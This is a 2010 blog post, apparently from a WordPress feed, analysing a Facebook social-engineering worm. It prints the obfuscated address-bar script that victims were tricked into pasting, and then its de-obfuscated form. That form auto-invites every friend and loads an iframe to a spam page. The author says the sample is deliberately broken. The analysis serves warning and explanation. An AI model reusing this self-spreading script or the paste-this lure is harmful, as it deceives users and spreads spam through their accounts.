RawDev.net » JavaScript http://rawdev.net Just another Zabreznik.si Sites site Fri, 30 Sep 2011 12:16:15 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 Facebook Trojan Worm http://rawdev.net/2010/05/08/facebook-trojan-worm/ http://rawdev.net/2010/05/08/facebook-trojan-worm/#comments Sat, 08 May 2010 20:44:45 +0000 marko http://www.rawdev.net/?p=252 Guess what, Facebook has another worm – the social “please help me breed” engineering kind.

Got a suggestion from a friend to a page called “Who Removed You” or “Get a free iWhatever” and clicked and found that it directs you to its summary page that asks you to copy-paste some code to your address bar. You did ?

This is as basic as social engineering goes. As you de-obfuscate the code:

javascript:var _0x8293=["\x69\x6E\x6E   ...     etc     ...   x65\x3E"];
var variables=[_0x8293[0],_0x8293[1],_0x8293[2],_0x8293[3]
,_0x8293[4],_0x8293[5],_0x8293[6],_0x8293[7],_0x8293[8],_0x8293[9],_0x8293[10],
_0x8293[11],_0x8293[12],_0x8293[13]];
void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true);
void ss[variables[9]](c);
void setTimeout(function (){fs[variables[10]]();} ,4000);
void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000);
void (document[variables[2]](variables[1])[variables[0]]=_0x8293[14]);

you get something like:

document.getElementById("app1153454353453_body").innerHTML = "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=15345435345\ class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";


var ss=document.getElementById("suggest");


var c=document.createEvent("MouseEvents");


c.initEvent("click",true,true);


void ss.dispatchEvent(c);


void setTimeout(function (){fs.select_all();} ,4000);


void setTimeout(function (){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php");} ,5000);


void (document.getElementById("app1153454353453_body").innerHTML="<iframe src=\"http:// whodeletedyou dot blogspot.com/p/click-here-to-find-out-how-to-know-who.html\" style=\"width: 800px; height: 600px;\" frameborder=0 scrolling=\"no\"></iframe>");

Note: I intentionally broke this sample.

The code makes a “suggest to friends” popup, selects them all and sends it – you have no idea what hapened – then it sends you to another spam site – often asking you to fill out a survey.

This is the kind of thing that wont happen to most Facebook users ( as the concept of copy/paste and address bar is way beyond most people – not to mention the hand coordination one has to have to select the code ), so don’t expect this kind of thing from your Mom. (unless she just mass suggests everything by herself anyway ). /rant

As for the guy that worried who removed him so much he just had to copy+paste: Don’t worry, you wont see me go.

In related news, there is no way to report these kind of issues to Facebook.

~copy&paste

]]> http://rawdev.net/2010/05/08/facebook-trojan-worm/feed/ 1